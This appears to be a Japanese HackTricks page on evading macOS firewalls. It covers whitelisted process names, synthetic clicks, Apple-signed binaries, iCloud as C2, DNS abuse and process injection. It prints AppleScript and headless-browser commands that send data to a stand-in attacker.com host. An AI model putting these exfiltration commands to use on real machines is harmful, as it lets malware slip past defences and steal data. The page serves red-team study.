macOS ファイアウォールのバイパス

Reading time: 4 minutes

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

発見された技術

以下の技術は、いくつかの macOS ファイアウォールアプリで動作することが確認されました。

ホワイトリスト名の悪用

  • 例えば、launchd のようなよく知られた macOS プロセスの名前でマルウェアを呼び出すこと。

合成クリック

  • ファイアウォールがユーザーに許可を求める場合、マルウェアに 許可をクリックさせる

Apple 署名のバイナリを使用

  • curl のようなもの、他にも whois など。

よく知られた Apple ドメイン

ファイアウォールは、apple.comicloud.com のようなよく知られた Apple ドメインへの接続を許可している可能性があります。そして、iCloud は C2 として使用される可能性があります。

一般的なバイパス

ファイアウォールをバイパスするためのいくつかのアイデア。

許可されたトラフィックの確認

許可されたトラフィックを知ることで、潜在的にホワイトリストに登録されたドメインや、どのアプリケーションがそれらにアクセスできるかを特定するのに役立ちます。

bash
lsof -i TCP -sTCP:ESTABLISHED

DNSの悪用

DNS解決は、DNSサーバーに接続することが許可されている可能性が高い**mdnsreponder**署名アプリケーションを介して行われます。

https://www.youtube.com/watch?v=UlT5KFTMn2k

ブラウザアプリを介して

  • oascript
applescript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
  • グーグルクローム
bash
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
  • ファイアフォックス
bash
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
  • サファリ
bash
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

プロセスインジェクションを介して

接続を許可されたプロセスにコードを注入できれば、ファイアウォールの保護を回避できます:

macOS Process Abuse

参考文献

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする